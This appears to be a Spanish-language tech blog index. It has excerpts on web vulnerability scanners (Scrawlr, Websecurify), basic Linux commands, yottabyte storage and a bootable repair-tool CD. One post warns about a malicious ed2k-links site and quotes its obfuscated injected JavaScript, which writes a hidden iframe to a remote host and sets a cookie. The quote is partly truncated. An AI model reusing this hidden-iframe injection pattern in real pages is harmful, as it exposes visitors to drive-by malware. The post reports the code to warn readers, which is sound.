Desde el Blog de Mark Painter (The HP Security Laboratory Blog) podemos descargar Scrawlr, una herramienta de HP para sistemas operativos Windows (Quizás con Wine…) que realiza un escáner a tu sitio web en busca de debilidades que puedan facilitar a un atacante una inyección SQL. Después del revuelo de los ataques masivos vía SQL, no está de mas probar ésta herramienta gratuita.

Descarga SCrawlr desde la web oficial de HP rellenando éste formulario.

Más información sobre los ataques masivos aquí:  http://www.computerworld.com/

Scrawlr FAQ:   h30507.www3.hp.com

Otros: PowerPoint de Isabel Gomez y Miguel Jimenez/Defensa_contra_ataques_web_comunes

Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry

La mayoría de éstos comandos son muy usados en la mayoría de ramas GNU/Linux, aunque según la distribución que usemos éstos lógicamente podrían variar. Os dejamos una pequeña recopilación de algunos de los comandos mas usados generalizadamente y que seguramente te serán de gran utilidad independientemente de la distro que uses.

Comandos archivos y directorios (crear y borrar directorios, listar, copiar, renombrar y borrar archivos, crear enlace entre archivos…etc):

ls : Listar archivos y directorios.
cp : Copiar archivos y directorios.
pwd : Mostrar el nombre del directorio de trabajo actual.
cd : Cambiar de directorio.
sort : Ordenar ficheros.
mkdir : Crear directorios.
touch : Crear o actualizar ficheros.
rm : Borrar archivos y/o directorios.
rmdir : Borrar directorios vacios.
mv : Mover o renombrar archivos.
more : Muestra ficheros página a página.
less : Muestra Ficheros página a página.
cat : Mostrar ficheros de forma continua.
head : Ver el inicio de un archivo.

Read the rest of this entry

Hace algunos meses encontremos esta interesante imagen en la web geeksroom, donde se nos explica (en español ) para hacernos una idea de una forma gráfica lo que ocuparían unidades de almacenamiento de tal envergadura. Así pues, de momento el Yottabyte nos sirve de medida para por ejemplo averiguar el “peso” de un descomunal volumen de archivos y datos.

(Ejemplo 1: Tengo el correo electrónico saturado de basura, mi carpeta de Spam ocupa 16 Yottabytes)

(Ejemplo 2: 03/04/2080 Apple lanza el Iphone 30 con 1 Yottabyte de capacidad!)

Hoy en día esto es irrisorio e imposible con nuestra tecnología, pero mirando atrás…hace apenas 43 años que IBM comercializaba el floppy disk, toda una novedad en la época.  La nanotecnología y varios descubrimientos y avances ha hecho posible que cada vez dispongamos de más espacio de almacenamiento en menos espacio físico así como de más mejoras y prestaciones y ya están apareciendo discos solidos de almacenamiento (SSD) de capacidades gigantes (Igual que sus precios), pero será posible algún día disponer de un dispositivo de almacenamiento doméstico de 1 Yottabyte? Necesitaremos tanto espacio?. Tiempo al tiempo… Read the rest of this entry

Websecurify es un escáner automático de seguridad en aplicaciones Web para plataformas Windows, Mac OS y GNU/Linux,  realmente intuitivo y fácil de utilizar.

Éstos son algunos de los aspectos mas interesantes de Websecurify:

1. Es 100% open source, GPL, producto CC, listo para beneficiar al movimiento de código abierto.

2. El motor emplea tecnologías, como los trabajadores Web, desde las últimas especificaciones de HTML5.

3. La mayoría del código está escrito en JavaScript, pero muchas partes pueden reescribirse y ampliarse con Python, Java y C.

4. Las pruebas y los mecanismos de información son asincrónicos. Esto significa que el informe se puede consultar mientras se realiza el examen. También significa que las decisiones se adoptan de inmediato, es decir, no están programadas.

5. Puede ser ampliado en más o menos la misma forma que se puede extender Firefox y Thunderbird…

Más información y descargas:

Página web oficial: Websecurify Escáner

Código Fuente: Websecurify Source

GNUZITIZEN: gnucitizen.org / gnucitizen.net

La versión 15 de ésta fantástica y ya mítica recopilación de utilidades en CD/USB autoarrancable nos viene con las siguientes herramientas:

Antivirus:

-ComboFix: Diseñado para limpieza de las infecciones de malware y restaurar la configuración modificada por el mismo malware.
-CWShredder 2,19: Herramienta elimina-Troyanos.
-Dr.Web CureIt!: Antivirus “gratuito” anti-spyware y escáner bajo demanda.
-GMER 1.0.15: Analiza los servicios ocultos,el registro, escanea archivos ocultos,  elimina Rootkits.
-Malwarebytes ‘Anti-Malware 1.46: Aplicación anti-malware que elimina completamente, incluso los más avanzados malware.
-RootkitRevealer 1.7.1: Detección de rootkits.
-SmitFraudFix 2,424: Esto elimina algunos de los populares Hijack malware de escritorio.
-Spybot – Search & Destroy 1.6.2: Aplicación para escanear en busca de spyware, adware y otros programas maliciosos.
-SpywareBlaster 4.3: Impedir la instalación de spyware y otro software potencialmente no deseado.
-SuperAntiSpyware 4.38.1004: Elimina el malware, rootkits, spyware, adware, gusanos..etc.

Herramientas para copias de seguridad:

- Ghost G4L 4 Linux 0.33A: Particionador y clonador, herramienta similar a Norton Ghost.
- Partition Image – Partimage 0.6.9: Sistema de archivos admitidos ext2, ext3, ReiserFS, HFS, HPFS, JFS, XFS, UFS, FAT16, FAT32 y NTFS.
- Build013 COPYR.DMA: Una herramienta para hacer copias de discos duros con sectores defectuosos.
- Double Driver 3.0: Controlador de copia de seguridad y herramienta de restauración.
- DriverBackup! 1.0.3: Otra herramienta útil para hacer de copia de seguridad de los drivers.
- DriveImageXML 2,13: Copia de seguridad de cualquier unidad.
- FastCopy 2,01: el más rápido en Copiar/Eliminar software en Windows.
- GimageX 2.0.17: ImageX se usa para copias de seguridad / restaurar imágenes WIM para Windows XP / Vista y Windows 7.
- InfraRecorder 0.50: Software de grabación de DVD, también crea y graba.
- Partición de ahorro 3,80: Una herramienta para copias de seguridad / restaurar particiones. (SavePart.exe).
- Regbak 1.0: Una ligera y sencilla utilidad para crear copias de seguridad de archivos del Registro de Windows.
- Autoimagen 1.2.1.92: Para crear archivos de imagen  de las particiones.
- Conductor Smart Backup 2.12: Copia de seguridad fácil de controladores de dispositivo de Windows.
- WhitSoft File Splitter 4.5a: Únete a un pequeño archivo Split-herramienta.
- Drive SnapShot 1,40: Crea una imagen exacta del disco de su sistema en un archivo mientras se está ejecutando Windows.
- Acronis True Image 8.1.945: Crear una imagen exacta del disco duro para copias de seguridad completa del sistema y la clonación de disco.
- Drive Image 2002: El mejor software para clonar el disco duro para Windows 98/2000/XP.
- Norton Ghost 11.5.1: Similar a Drive Image (con imágenes de Explorer y soporte usb / scsi). Read the rest of this entry